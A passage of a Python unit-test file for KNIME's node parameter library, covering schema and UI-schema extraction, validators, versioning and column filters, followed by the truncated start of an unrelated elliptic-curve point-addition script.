\"#/properties/model/properties/bool_advanced_param\",\n \"type\": \"Control\",\n \"label\": \"Boolean Parameter\",\n \"options\": {\"format\": \"boolean\", \"isAdvanced\": True},\n },\n {\n \"scope\": \"#/properties/model/properties/column_param\",\n \"type\": \"Control\",\n \"label\": \"Column Parameter\",\n \"options\": {\n \"format\": \"dropDown\",\n \"showRowKeys\": False,\n \"showNoneColumn\": False,\n \"possibleValues\": test_possible_values,\n },\n },\n {\n \"scope\": \"#/properties/model/properties/column_advanced_param\",\n \"type\": \"Control\",\n \"label\": \"Column Parameter\",\n \"options\": {\n \"format\": \"dropDown\",\n \"showRowKeys\": False,\n \"showNoneColumn\": False,\n \"possibleValues\": test_possible_values,\n \"isAdvanced\": True,\n },\n },\n {\n \"scope\": \"#/properties/model/properties/multi_column_param\",\n \"type\": \"Control\",\n \"label\": \"Multi Column Parameter\",\n \"options\": {\n \"format\": \"twinList\",\n \"possibleValues\": test_possible_values,\n },\n },\n {\n \"scope\": \"#/properties/model/properties/multi_column_advanced_param\",\n \"type\": \"Control\",\n \"label\": \"Multi Column Parameter\",\n \"options\": {\n \"format\": \"twinList\",\n \"possibleValues\": test_possible_values,\n \"isAdvanced\": True,\n },\n },\n {\n \"scope\": \"#/properties/model/properties/full_multi_column_param\",\n \"type\": \"Control\",\n \"label\": \"Full Multi Column Parameter\",\n \"options\": {\n \"format\": \"columnFilter\",\n \"showSearch\": True,\n \"showMode\": True,\n \"possibleValues\": test_possible_values,\n \"isAdvanced\": True,\n },\n },\n {\n \"type\": \"Section\",\n \"label\": \"Primary Group\",\n \"options\": {},\n \"elements\": [\n {\n \"type\": \"Group\",\n \"label\": \"Subgroup\",\n \"options\": {},\n \"elements\": [\n {\n \"scope\": \"#/properties/model/properties/parameter_group/properties/subgroup/properties/first\",\n \"type\": \"Control\",\n \"label\": \"First Parameter\",\n \"options\": {\"format\": \"integer\"},\n },\n {\n \"scope\": \"#/properties/model/properties/parameter_group/properties/subgroup/properties/second\",\n \"type\": \"Control\",\n \"label\": \"Second Parameter\",\n \"options\": {\"format\": \"integer\"},\n },\n ],\n },\n {\n \"scope\": \"#/properties/model/properties/parameter_group/properties/third\",\n \"type\": \"Control\",\n \"label\": \"Internal int Parameter\",\n \"options\": {\"format\": \"integer\"},\n },\n ],\n },\n {\n \"type\": \"Section\",\n \"label\": \"Primary Group Advanced\",\n \"options\": {\"isAdvanced\": True},\n \"elements\": [\n {\n \"type\": \"Group\",\n \"label\": \"Subgroup\",\n \"options\": {},\n \"elements\": [\n {\n \"scope\": \"#/properties/model/properties/parameter_group_advanced/properties/subgroup/properties/first\",\n \"type\": \"Control\",\n \"label\": \"First Parameter\",\n \"options\": {\"format\": \"integer\"},\n },\n {\n \"scope\": \"#/properties/model/properties/parameter_group_advanced/properties/subgroup/properties/second\",\n \"type\": \"Control\",\n \"label\": \"Second Parameter\",\n \"options\": {\"format\": \"integer\"},\n },\n ],\n },\n {\n \"scope\": \"#/properties/model/properties/parameter_group_advanced/properties/third\",\n \"type\": \"Control\",\n \"label\": \"Internal int Parameter\",\n \"options\": {\"format\": \"integer\"},\n },\n ],\n },\n ],\n }\n extracted = kp.extract_ui_schema(\n self.parameterized_advanced_option,\n DummyDialogCreationContext(),\n )\n self.assertEqual(expected, extracted)\n\n def test_default_validators(self):\n \"\"\"\n Test the default 
type-checking validators provided with each parameter class.\n \"\"\"\n with self.assertRaises(TypeError):\n self.parameterized.int_param = \"foo\"\n\n with self.assertRaises(TypeError):\n self.parameterized.string_param = 1\n\n with self.assertRaises(TypeError):\n self.parameterized.bool_param = 1\n\n def test_custom_validators(self):\n \"\"\"\n Test custom validators for parameters.\n\n Note: custom validators can currently only be set inside of the parameter\n group class definition.\n \"\"\"\n with self.assertRaises(ValueError):\n self.parameterized.parameter_group.third = -1\n\n with self.assertRaises(ValueError):\n self.parameterized.string_param = \"hello there, General Kenobi\"\n\n # Check that the default type validators still work\n with self.assertRaises(TypeError):\n self.parameterized.parameter_group.third = \"foo\"\n\n with self.assertRaises(TypeError):\n self.parameterized.string_param = 1\n\n def test_group_validation(self):\n \"\"\"\n Test validators for parameter groups. Group validators can be set internally inside the\n group class definition using the validate(self, values) method, or externally using the\n @group_name.validator decorator notation.\n\n Validators for parameterized.parameter_group.subgroup:\n - Internal validator: sum of values must not be larger than 100.\n - External validator: sum of values must not be negative OR 'first' must not be equal to 42.\n \"\"\"\n params_internal = generate_values_dict(first=100)\n params_external = generate_values_dict(first=-90)\n params_forbidden = generate_values_dict(first=42)\n\n with self.assertRaises(ValueError):\n kp.validate_parameters(self.parameterized, params_internal)\n\n with self.assertRaises(ValueError):\n kp.validate_parameters(self.parameterized, params_external)\n\n with self.assertRaises(ValueError):\n kp.validate_parameters(self.parameterized, params_forbidden)\n\n def test_groups_are_independent(self):\n obj1 = Parameterized()\n obj2 = Parameterized()\n group1 = obj1.parameter_group\n group1.third = 5\n self.assertEqual(group1.third, 5)\n obj2.parameter_group.third = 7\n self.assertEqual(group1.third, 5)\n\n #### Test parameter composition: ####\n def test_extract_parameters_from_uninitialized_composed(self):\n obj = ComposedParameterized()\n parameters = kp.extract_parameters(obj)\n expected = {\n \"model\": {\n \"first_group\": {\"first_param\": 12345, \"second_param\": 54321},\n \"second_group\": {\"first_param\": 12345, \"second_param\": 54321},\n }\n }\n self.assertEqual(parameters, expected)\n\n def test_all_pipelines(self):\n \"\"\"\n Test getting and setting for simple parameters and parameter groups.\n Both descriptor-based and composed approaches are tested.\n \"\"\"\n ##### descriptor-based #####\n # descriptor non-nested\n obj_descr_simple = self.parameterized_without_group\n obj_descr_simple = ParameterizedWithoutGroup()\n set_column_parameters(obj_descr_simple)\n # test getting\n self.assertEqual(obj_descr_simple.int_param, 3)\n # test setting\n obj_descr_simple.int_param = 42\n descr_simple_extracted = kp.extract_parameters(obj_descr_simple)\n descr_simple_expected = generate_values_dict_without_groups(42)\n self.assertEqual(descr_simple_extracted, descr_simple_expected)\n\n # descriptor one group\n obj_descr_one_group = ParameterizedWithOneGroup()\n set_column_parameters(obj_descr_one_group)\n # test getting\n self.assertEqual(obj_descr_one_group.parameter_group.first, 1)\n # test setting\n obj_descr_one_group.parameter_group.first = 42\n descr_one_group_extracted = 
kp.extract_parameters(obj_descr_one_group)\n descr_one_group_expected = generate_values_dict_with_one_group(first=42)\n self.assertEqual(descr_one_group_extracted, descr_one_group_expected)\n\n # descriptor nested groups\n obj_descr_nested_groups = Parameterized()\n set_column_parameters(obj_descr_nested_groups)\n # test getting\n self.assertEqual(obj_descr_nested_groups.parameter_group.subgroup.first, 1)\n # test setting\n obj_descr_nested_groups.parameter_group.subgroup.first = 42\n descr_nested_groups_extracted = kp.extract_parameters(obj_descr_nested_groups)\n descr_nested_groups_expected = generate_values_dict(first=42)\n self.assertEqual(descr_nested_groups_extracted, descr_nested_groups_expected)\n\n ##### composed #####\n # # composed non-nested (here `param` was also declared as a class-level descriptor)\n # obj_composed_simple = ComposedParameterizedWithoutGroup(54321)\n # # test getting\n # self.assertEqual(obj_composed_simple.param, 54321)\n # # test setting\n # obj_composed_simple.param = 42\n # composed_simple_extracted = kp.extract_parameters(obj_composed_simple)\n # composed_simple_expected = {\"model\": {\"param\": 42}}\n # self.assertEqual(composed_simple_extracted, composed_simple_expected)\n\n # composed one group\n obj_composed_one_group = ComposedParameterized()\n # test getting\n self.assertEqual(obj_composed_one_group.first_group.first_param, 12345)\n # test setting\n obj_composed_one_group.first_group.first_param = 42\n composed_one_group_extracted = kp.extract_parameters(obj_composed_one_group)\n composed_one_group_expected = {\n \"model\": {\n \"first_group\": {\"first_param\": 42, \"second_param\": 54321},\n \"second_group\": {\"first_param\": 12345, \"second_param\": 54321},\n }\n }\n self.assertEqual(composed_one_group_extracted, composed_one_group_expected)\n\n # composed nested groups\n obj_composed_nested_groups = NestedComposedParameterized()\n # test getting\n self.assertEqual(\n obj_composed_nested_groups.group.first_group.first_param, 12345\n )\n # test setting\n obj_composed_nested_groups.group.first_group.first_param = 42\n composed_nested_groups_extracted = kp.extract_parameters(\n obj_composed_nested_groups\n )\n composed_nested_groups_expected = (\n obj_composed_nested_groups.create_default_dict()\n )\n composed_nested_groups_expected[\"model\"][\"group\"][\"first_group\"][\n \"first_param\"\n ] = 42\n\n self.assertEqual(\n composed_nested_groups_extracted, composed_nested_groups_expected\n )\n\n def test_extract_parameters_from_altered_composed(self):\n obj = ComposedParameterized()\n obj.first_group.first_param = 3\n parameters = kp.extract_parameters(obj)\n expected = {\n \"model\": {\n \"first_group\": {\"first_param\": 3, \"second_param\": 54321},\n \"second_group\": {\"first_param\": 12345, \"second_param\": 54321},\n }\n }\n self.assertEqual(parameters, expected)\n\n def test_extract_altered_nested_composition(self):\n obj = NestedComposedParameterized()\n obj.group.first_group.first_param = 42\n extracted = kp.extract_parameters(obj)\n expected = NestedComposedParameterized.create_default_dict()\n expected[\"model\"][\"group\"][\"first_group\"][\"first_param\"] = 42\n self.assertEqual(expected, extracted)\n\n def test_extract_default_nested_compositon(self):\n obj = NestedComposedParameterized()\n extracted = kp.extract_parameters(obj)\n expected = NestedComposedParameterized.create_default_dict()\n self.assertEqual(expected, extracted)\n\n def test_inject_extract_nested_composition(self):\n obj = NestedComposedParameterized()\n inject = 
NestedComposedParameterized.create_default_dict()\n inject[\"model\"][\"group\"][\"first_group\"][\"first_param\"] = 2\n inject[\"model\"][\"group\"][\"second_group\"][\"first_param\"] = -5\n kp.inject_parameters(obj, inject, None)\n extracted = kp.extract_parameters(obj)\n self.assertEqual(inject, extracted)\n\n def test_nested_composed_init_setting(self):\n \"\"\"\n Test value retention when the root group of a nested series of groups is defined inside __init__.\n Test both composed and descriptor nested groups.\n \"\"\"\n obj = ComplexNestedComposedParameterized()\n obj_expected = obj.get_expected_params()\n\n inject_composed = obj_expected.copy()\n inject_composed[\"model\"][\"init_group\"][\"group_root_param\"] = \"CHANGED\"\n inject_composed[\"model\"][\"init_group\"][\"new_constructor_param\"] = \"CHANGED\"\n inject_composed[\"model\"][\"init_group\"][\"group_root_nested\"][\n \"nested_root_param\"\n ] = \"CHANGED\"\n inject_composed[\"model\"][\"init_group\"][\"group_root_nested\"][\n \"nested_init_param\"\n ] = \"CHANGED\"\n inject_composed[\"model\"][\"init_group\"][\"group_init_nested\"][\n \"nested_root_param\"\n ] = \"CHANGED\"\n inject_composed[\"model\"][\"init_group\"][\"group_init_nested\"][\n \"nested_init_param\"\n ] = \"CHANGED\"\n kp.inject_parameters(obj, inject_composed)\n composed_extracted = kp.extract_parameters(obj)\n self.assertEqual(composed_extracted, inject_composed)\n\n def test_nested_composed_descriptor_setting(self):\n \"\"\"\n Test value retention when the root group of a nested series of groups is a descriptor.\n Test both composed and descriptor nested groups.\n \"\"\"\n obj = ComplexNestedComposedParameterized()\n obj_expected = obj.get_expected_params()\n\n inject_descriptor = obj_expected.copy()\n inject_descriptor[\"model\"][\"root_param\"] = \"CHANGED\"\n inject_descriptor[\"model\"][\"root_group\"][\"group_root_param\"] = \"CHANGED\"\n inject_descriptor[\"model\"][\"root_group\"][\"new_constructor_param\"] = \"CHANGED\"\n inject_descriptor[\"model\"][\"root_group\"][\"group_root_nested\"][\n \"nested_root_param\"\n ] = \"CHANGED\"\n inject_descriptor[\"model\"][\"root_group\"][\"group_root_nested\"][\n \"nested_init_param\"\n ] = \"CHANGED\"\n\n inject_descriptor[\"model\"][\"root_group\"][\"group_init_nested\"][\n \"nested_root_param\"\n ] = \"CHANGED\"\n inject_descriptor[\"model\"][\"root_group\"][\"group_init_nested\"][\n \"nested_init_param\"\n ] = \"CHANGED\"\n kp.inject_parameters(obj, inject_descriptor)\n descriptor_extracted = kp.extract_parameters(obj)\n self.assertEqual(descriptor_extracted, inject_descriptor)\n\n def test_extract_schema_from_composed(self):\n obj = ComposedParameterized()\n schema = kp.extract_schema(obj)\n expected = {\n \"type\": \"object\",\n \"properties\": {\n \"model\": {\n \"type\": \"object\",\n \"properties\": {\n \"first_group\": {\n \"type\": \"object\",\n \"properties\": {\n \"first_param\": {\n \"title\": \"Plain int param\",\n \"description\": \"Description of the plain int param.\",\n \"type\": \"integer\",\n \"format\": \"int32\",\n },\n \"second_param\": {\n \"title\": \"Second int param\",\n \"description\": \"Description of the second plain int param.\",\n \"type\": \"integer\",\n \"format\": \"int32\",\n },\n },\n },\n \"second_group\": {\n \"type\": \"object\",\n \"properties\": {\n \"first_param\": {\n \"title\": \"Plain int param\",\n \"description\": \"Description of the plain int param.\",\n \"type\": \"integer\",\n \"format\": \"int32\",\n },\n \"second_param\": {\n \"title\": \"Second int 
param\",\n \"description\": \"Description of the second plain int param.\",\n \"type\": \"integer\",\n \"format\": \"int32\",\n },\n },\n },\n },\n },\n },\n }\n self.assertEqual(schema, expected)\n\n def test_extract_ui_schema_from_composed(self):\n obj = ComposedParameterized()\n ui_schema = kp.extract_ui_schema(obj, DummyDialogCreationContext())\n expected = {\n \"type\": \"VerticalLayout\",\n \"elements\": [\n {\n \"type\": \"Section\",\n \"label\": \"Parameter group to be used for multiple descriptor instances.\",\n \"options\": {},\n \"elements\": [\n {\n \"type\": \"Control\",\n \"label\": \"Plain int param\",\n \"scope\": \"#/properties/model/properties/first_group/properties/first_param\",\n \"options\": {\"format\": \"integer\"},\n },\n {\n \"type\": \"Control\",\n \"label\": \"Second int param\",\n \"scope\": \"#/properties/model/properties/first_group/properties/second_param\",\n \"options\": {\"format\": \"integer\"},\n },\n ],\n },\n {\n \"type\": \"Section\",\n \"label\": \"Parameter group to be used for multiple descriptor instances.\",\n \"options\": {},\n \"elements\": [\n {\n \"type\": \"Control\",\n \"label\": \"Plain int param\",\n \"scope\": \"#/properties/model/properties/second_group/properties/first_param\",\n \"options\": {\"format\": \"integer\"},\n },\n {\n \"type\": \"Control\",\n \"label\": \"Second int param\",\n \"scope\": \"#/properties/model/properties/second_group/properties/second_param\",\n \"options\": {\"format\": \"integer\"},\n },\n ],\n },\n ],\n }\n self.assertEqual(ui_schema, expected)\n\n def test_extract_description(self):\n expected = [\n {\n \"name\": \"Options\",\n \"description\": \"\",\n \"options\": [\n {\"name\": \"Int Parameter\", \"description\": \"An integer parameter\"},\n {\"name\": \"Double Parameter\", \"description\": \"A double parameter\"},\n {\"name\": \"String Parameter\", \"description\": \"A string parameter\"},\n {\n \"name\": \"Multiline String Parameter\",\n \"description\": \"A multiline string parameter\",\n },\n {\"name\": \"Boolean Parameter\", \"description\": \"A boolean parameter\"},\n {\n \"name\": \"Column Parameter\",\n \"description\": \"A column parameter\",\n },\n {\n \"name\": \"Multi Column Parameter\",\n \"description\": \"A multi column parameter\",\n },\n {\n \"name\": \"Full Multi Column Parameter\",\n \"description\": \"A full multi column parameter\",\n },\n ],\n },\n {\n \"name\": \"Primary Group\",\n \"description\": \"A parameter group which contains a parameter group as a subgroup, and sets a custom validator for a parameter.\",\n \"options\": [\n {\n \"name\": \"First Parameter\",\n \"description\": \"First parameter description\",\n },\n {\n \"name\": \"Second Parameter\",\n \"description\": \"Second parameter description\",\n },\n {\n \"name\": \"Internal int Parameter\",\n \"description\": \"Internal int parameter description\",\n },\n ],\n },\n ]\n\n description, use_tabs = kp.extract_parameter_descriptions(self.parameterized)\n\n self.assertTrue(use_tabs)\n self.assertEqual(description, expected)\n\n # Without a group -> only top level options\n expected = [\n {\"name\": \"Int Parameter\", \"description\": \"An integer parameter\"},\n {\"name\": \"Double Parameter\", \"description\": \"A double parameter\"},\n {\"name\": \"String Parameter\", \"description\": \"A string parameter\"},\n {\"name\": \"Boolean Parameter\", \"description\": \"A boolean parameter\"},\n {\"name\": \"Column Parameter\", \"description\": \"A column parameter\"},\n {\n \"name\": \"Multi Column Parameter\",\n 
\"description\": \"A multi column parameter\",\n },\n {\n \"name\": \"Full Multi Column Parameter\",\n \"description\": \"A full multi column parameter\",\n },\n ]\n description, use_tabs = kp.extract_parameter_descriptions(\n self.parameterized_without_group\n )\n self.assertFalse(use_tabs)\n self.assertEqual(description, expected)\n\n def test_extract_description_with_intendation(self):\n expected = [\n {\n \"description\": \"\\n Any Text\\n \\n\\n **Available options:**\\n\\n - Default: This is the default option, since additional options have not been provided.\\n\",\n \"name\": \"Indented Enum Parameter\",\n },\n {\n \"description\": \"\\n Any Text\\n \\n\\n **Available options:**\\n\\n - Default: This is the default option, since additional options have not been provided.\\n\",\n \"name\": \"Indented Enum Parameter\",\n },\n ]\n description, use_tabs = kp.extract_parameter_descriptions(\n self.parameterized_with_indented_docstring\n )\n\n self.assertEqual(description, expected)\n\n def test_inject_validates(self):\n pass # TODO\n # injection of custom parameter/parameter group validators can only be done\n # inside their \"parent\" class declaration\n\n ### Test versioning of node settings ####\n def test_extract_schema_with_version(self):\n for version in [\"0.1.0\", \"0.2.0\", \"0.3.0\"]:\n schema = kp.extract_schema(self.versioned_parameterized, version)\n expected = generate_versioned_schema_dict(extension_version=version)\n self.assertEqual(schema, expected)\n\n def test_version_parsing(self):\n # test default behaviour\n self.assertEqual(kp.Version.parse_version(None), kp.Version(0, 0, 0))\n\n self.assertEqual(\n kp.Version.parse_version(kp.Version.parse_version(None)),\n kp.Version(0, 0, 0),\n )\n\n self.assertEqual(kp.Version.parse_version(\"0.1.0\"), kp.Version(0, 1, 0))\n\n # test that incorrect formatting raises ValueError\n for version in [\n \"0.0.0.1\",\n \"0.0.a\",\n \"0.1.a\",\n \"0.1.0-alpha\",\n \"0.0-alpha.1\",\n \"1.-3.7.-5.2\",\n \".0.1\",\n \"a.b.c\",\n \"\",\n \"0\",\n \"...\",\n ]:\n with self.assertRaises(ValueError):\n kp.Version.parse_version(version)\n\n # check that comparing version works as expected\n self.assertTrue(kp.Version(0, 1, 0) > kp.Version(0, 0, 0))\n self.assertTrue(kp.Version(0, 1, 0) >= kp.Version(0, 0, 0))\n self.assertTrue(kp.Version(0, 0, 1) >= kp.Version(0, 0, 0))\n self.assertTrue(kp.Version(1, 1, 2) >= kp.Version(1, 1, 1))\n\n def test_determining_compatibility(self):\n # given the version of the extension that the node settings were saved with,\n # and the version of the installed extension, test identifying whether\n # we have a case of backward or forward compatibility\n\n cases = [\n # (saved_version, installed_version, saved_params)\n (\n \"0.2.0\",\n \"0.1.0\",\n generate_versioned_values_dict(extension_version=\"0.2.0\"),\n ),\n (\n \"0.1.0\",\n \"0.2.0\",\n generate_versioned_values_dict(extension_version=\"0.1.0\"),\n ),\n (\n \"0.1.0\",\n \"0.3.0\",\n generate_versioned_values_dict(extension_version=\"0.1.0\"),\n ),\n (\n \"0.2.0\",\n \"0.3.0\",\n generate_versioned_values_dict(extension_version=\"0.2.0\"),\n ),\n ]\n\n with self.assertLogs(level=\"DEBUG\") as context_manager:\n for saved_version, installed_version, saved_params in cases:\n kp.determine_compatability(\n self.versioned_parameterized,\n saved_version,\n installed_version,\n saved_params,\n )\n\n self.assertEqual(\n [\n # 0.2.0 -> 0.1.0: forward compatibility (not supported)\n \"ERROR:Python backend: The node was previously configured with a newer version of 
the extension, 0.2.0, while the current version is 0.1.0.\",\n \"ERROR:Python backend: The node might not work as expected without being reconfigured.\",\n # 0.1.0 -> 0.2.0: backward compatibility\n \"DEBUG:Python backend: The node was previously configured with an older version of the extension, 0.1.0, while the current version is 0.2.0.\",\n \"DEBUG:Python backend: The following parameters have since been added, and are configured with their default values:\",\n 'DEBUG:Python backend: - \"String Parameter\"',\n 'DEBUG:Python backend: - \"First Parameter\"',\n # 0.1.0 -> 0.3.0: backward compatibility\n \"DEBUG:Python backend: The node was previously configured with an older version of the extension, 0.1.0, while the current version is 0.3.0.\",\n \"DEBUG:Python backend: The following parameters have since been added, and are configured with their default values:\",\n 'DEBUG:Python backend: - \"String Parameter\"',\n 'DEBUG:Python backend: - \"Boolean Parameter\"',\n 'DEBUG:Python backend: - \"First Parameter\"',\n 'DEBUG:Python backend: - \"Second Parameter\"',\n # 0.2.0 -> 0.3.0: backward compatibility\n \"DEBUG:Python backend: The node was previously configured with an older version of the extension, 0.2.0, while the current version is 0.3.0.\",\n \"DEBUG:Python backend: The following parameters have since been added, and are configured with their default values:\",\n 'DEBUG:Python backend: - \"Boolean Parameter\"',\n 'DEBUG:Python backend: - \"Second Parameter\"',\n ],\n context_manager.output,\n )\n\n def test_custom_methods_in_parameter_groups(self):\n self.assertEqual(\n self.parameterized_with_custom_methods.outer_group.recursive_method(0), 10\n )\n\n self.assertEqual(\n self.parameterized_with_custom_methods.outer_group.middle_group.inner_group.inner_foo(),\n 4,\n )\n\n self.assertEqual(\n self.parameterized_with_custom_methods.outer_group.nested_method(),\n self.parameterized_with_custom_methods.outer_group.middle_group.inner_group.inner_foo(),\n )\n\n self.assertEqual(\n self.parameterized_with_custom_methods.outer_group._protected_method(),\n \"bar\",\n )\n\n # test that validation still works\n forbidden_params_inner = generate_values_dict_for_group_w_custom_method(\n inner_int_param2=3\n )\n forbidden_params_middle = generate_values_dict_for_group_w_custom_method(\n middle_int_param=10\n )\n\n with self.assertRaises(ValueError):\n kp.validate_parameters(\n self.parameterized_with_custom_methods, forbidden_params_inner\n )\n\n with self.assertRaises(ValueError):\n kp.validate_parameters(\n self.parameterized_with_custom_methods, forbidden_params_middle\n )\n\n\nclass FullColumnSelectionTest(unittest.TestCase):\n def test_apply_manual_filter(self):\n schema = ks.Schema.from_types(\n [ks.string(), ks.double(), ks.int32()],\n [\"string\", \"number_double\", \"number_int\"],\n )\n\n selection = kp.ColumnFilterConfig(mode=kp.ColumnFilterMode.MANUAL)\n\n selection.manual_filter = kp.ManualFilterConfig()\n filtered = selection.apply(schema)\n self.assertEqual(\n [\"string\", \"number_double\", \"number_int\"], filtered.column_names\n )\n\n selection.manual_filter = kp.ManualFilterConfig(include_unknown_columns=False)\n filtered = selection.apply(schema)\n self.assertEqual([], filtered.column_names)\n\n selection.manual_filter = kp.ManualFilterConfig(\n include_unknown_columns=False, included=[\"string\"]\n )\n filtered = selection.apply(schema)\n self.assertEqual([\"string\"], filtered.column_names)\n\n selection.manual_filter = kp.ManualFilterConfig(\n include_unknown_columns=True, 
included=[\"string\"]\n )\n filtered = selection.apply(schema)\n self.assertEqual(\n [\"string\", \"number_double\", \"number_int\"], filtered.column_names\n )\n\n selection.manual_filter = kp.ManualFilterConfig(\n include_unknown_columns=True, excluded=[\"string\"]\n )\n filtered = selection.apply(schema)\n self.assertEqual([\"number_double\", \"number_int\"], filtered.column_names)\n\n def test_apply_regex_filter(self):\n schema = ks.Schema.from_types(\n [ks.string(), ks.double(), ks.int32()],\n [\"string\", \"number_double\", \"number_int\"],\n )\n\n selection = kp.ColumnFilterConfig(mode=kp.ColumnFilterMode.REGEX)\n\n selection.pattern_filter = kp.PatternFilterConfig(pattern=\".*\")\n filtered = selection.apply(schema)\n self.assertEqual(\n [\"string\", \"number_double\", \"number_int\"], filtered.column_names\n )\n\n selection.pattern_filter = kp.PatternFilterConfig(inverted=True, pattern=\".*\")\n filtered = selection.apply(schema)\n self.assertEqual([], filtered.column_names)\n\n selection.pattern_filter = kp.PatternFilterConfig(pattern=\"Number\")\n filtered = selection.apply(schema)\n self.assertEqual([], filtered.column_names)\n\n selection.pattern_filter = kp.PatternFilterConfig(\n case_sensitive=True, pattern=\"Number\"\n )\n filtered = selection.apply(schema)\n self.assertEqual([], filtered.column_names)\n\n selection.pattern_filter = kp.PatternFilterConfig(\n case_sensitive=False, pattern=\"Number\"\n )\n filtered = selection.apply(schema)\n self.assertEqual([\"number_double\", \"number_int\"], filtered.column_names)\n\n selection.pattern_filter = kp.PatternFilterConfig(\n case_sensitive=True, inverted=True, pattern=\"Number\"\n )\n filtered = selection.apply(schema)\n self.assertEqual(\n [\"string\", \"number_double\", \"number_int\"], filtered.column_names\n )\n\n selection.pattern_filter = kp.PatternFilterConfig(\n case_sensitive=False, inverted=True, pattern=\"Number\"\n )\n filtered = selection.apply(schema)\n self.assertEqual([\"string\"], filtered.column_names)\n\n def test_apply_wildcard_filter(self):\n schema = ks.Schema.from_types(\n [ks.string(), ks.double(), ks.int32()],\n [\"string\", \"number[double]\", \"number[int]\"],\n )\n\n selection = kp.ColumnFilterConfig(mode=kp.ColumnFilterMode.WILDCARD)\n\n selection.pattern_filter = kp.PatternFilterConfig(pattern=\"*\")\n filtered = selection.apply(schema)\n self.assertEqual(\n [\"string\", \"number[double]\", \"number[int]\"], filtered.column_names\n )\n\n selection.pattern_filter = kp.PatternFilterConfig(inverted=True, pattern=\"*\")\n filtered = selection.apply(schema)\n self.assertEqual([], filtered.column_names)\n\n selection.pattern_filter = kp.PatternFilterConfig(pattern=\"Number\")\n filtered = selection.apply(schema)\n self.assertEqual([], filtered.column_names)\n\n selection.pattern_filter = kp.PatternFilterConfig(\n case_sensitive=True, pattern=\"Number\"\n )\n filtered = selection.apply(schema)\n self.assertEqual([], filtered.column_names)\n\n selection.pattern_filter = kp.PatternFilterConfig(\n case_sensitive=False, pattern=\"Number*\"\n )\n filtered = selection.apply(schema)\n self.assertEqual([\"number[double]\", \"number[int]\"], filtered.column_names)\n\n selection.pattern_filter = kp.PatternFilterConfig(\n case_sensitive=True, inverted=True, pattern=\"Number\"\n )\n filtered = selection.apply(schema)\n self.assertEqual(\n [\"string\", \"number[double]\", \"number[int]\"], filtered.column_names\n )\n\n selection.pattern_filter = kp.PatternFilterConfig(\n case_sensitive=False, inverted=True, 
pattern=\"Number*\"\n )\n filtered = selection.apply(schema)\n self.assertEqual([\"string\"], filtered.column_names)\n\n selection.pattern_filter = kp.PatternFilterConfig(\n case_sensitive=False, inverted=True, pattern=\"?umber*\"\n )\n filtered = selection.apply(schema)\n self.assertEqual([\"string\"], filtered.column_names)\n\n selection.pattern_filter = kp.PatternFilterConfig(\n case_sensitive=True, inverted=False, pattern=\"?umber*\"\n )\n filtered = selection.apply(schema)\n self.assertEqual([\"number[double]\", \"number[int]\"], filtered.column_names)\n\n selection.pattern_filter = kp.PatternFilterConfig(\n case_sensitive=True, inverted=False, pattern=\"number[*]\"\n )\n filtered = selection.apply(schema)\n self.assertEqual([\"number[double]\", \"number[int]\"], filtered.column_names)\n\n selection.pattern_filter = kp.PatternFilterConfig(\n case_sensitive=True, inverted=False, pattern=\"number[*\"\n )\n filtered = selection.apply(schema)\n self.assertEqual([\"number[double]\", \"number[int]\"], filtered.column_names)\n\n def test_apply_type_filter(self):\n schema = ks.Schema.from_types(\n [ks.string(), ks.double(), ks.int32()],\n [\"string\", \"number[double]\", \"number[int]\"],\n [\n {\"preferred_value_type\": \"MyString\"},\n {\"preferred_value_type\": \"MyDouble\"},\n {\"preferred_value_type\": \"MyInt\"},\n ],\n )\n\n selection = kp.ColumnFilterConfig(mode=kp.ColumnFilterMode.TYPE)\n\n selection.type_filter = kp.TypeFilterConfig(\n selected_types=[\"MyString\"], type_displays=[\"My String\"]\n )\n filtered = selection.apply(schema)\n self.assertEqual([\"string\"], filtered.column_names)\n\n selection.type_filter = kp.TypeFilterConfig(\n selected_types=[\"MyDouble\"], type_displays=[\"My Double\"]\n )\n filtered = selection.apply(schema)\n self.assertEqual([\"number[double]\"], filtered.column_names)\n\n selection.type_filter = kp.TypeFilterConfig(\n selected_types=[\"Random\"], type_displays=[\"Random\"]\n )\n filtered = selection.apply(schema)\n self.assertEqual([], filtered.column_names)\n\n selection.type_filter = kp.TypeFilterConfig(\n selected_types=[\"MyString\", \"MyDouble\"],\n type_displays=[\"My String\", \"My Double\"],\n )\n filtered = selection.apply(schema)\n self.assertEqual([\"string\", \"number[double]\"], filtered.column_names)\n\n schema = ks.Schema.from_types(\n [ks.string(), ks.double(), ks.int32()],\n [\"string\", \"number[double]\", \"number[int]\"],\n # No metadata given\n )\n selection.type_filter = kp.TypeFilterConfig(\n selected_types=[\"MyString\", \"MyDouble\"],\n type_displays=[\"My String\", \"My Double\"],\n )\n with self.assertLogs() as log:\n filtered = selection.apply(schema)\n self.assertEqual([], filtered.column_names) # all columns will be dropped\n self.assertIn(\n \"Ignoring column 'string' because it does not have a 'preferred_value_type' set.\",\n log.output[0],\n )\n self.assertIn(\n \"Ignoring column 'number[double]' because it does not have a 'preferred_value_type' set.\",\n log.output[1],\n )\n self.assertIn(\n \"Ignoring column 'number[int]' because it does not have a 'preferred_value_type' set.\",\n log.output[2],\n )\n\n def test_apply_with_prefilter(self):\n selection = kp.ColumnFilterConfig(\n mode=kp.ColumnFilterMode.MANUAL, pre_filter=lambda c: c.name != \"bar\"\n )\n schema = ks.Schema.from_types([ks.string()] * 3, [\"foo\", \"bar\", \"baz\"])\n selection.manual_filter = kp.ManualFilterConfig(\n included=[\"foo\"], excluded=[\"baz\"], include_unknown_columns=True\n )\n filtered = selection.apply(schema)\n 
self.assertEqual([\"foo\"], filtered.column_names)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"knime/knime-python","sub_path":"org.knime.python3.nodes.tests/src/test/python/unittest/test_knime_parameter.py","file_name":"test_knime_parameter.py","file_ext":"py","file_size_in_byte":95644,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"76"} +{"seq_id":"34377381510","text":"def isin(a,b,p,P):\n if p == 0:\n return True\n x,y = p[0],p[1]\n value = y**2-x**3-a*x-b\n if value%P == 0:\n return True\n return False\n\ndef add_point(a,b,p,q,P):\n if not isin(a,b,p,P):\n return ValueError(\"{} is not in the curve\".format(p))\n if not isin(a,b,q,P):\n return ValueError(\"{} is not in the curve\".format(q))\n \n if p == 0:\n return q\n if q == 0:\n return p\n x1,y1,x2,y2 = p[0],p[1],q[0],q[1]\n if x1 == x2 and y1 == -y2:\n return 0\n lamb = 0\n if p!=q:\n lamb = (y2-y1)*pow((x2-x1),-1,P)\n else:\n lamb = (3*x1**2+a)*pow((2*y1),-1,P)\n x3 = lamb**2-x1-x2\n y3 = 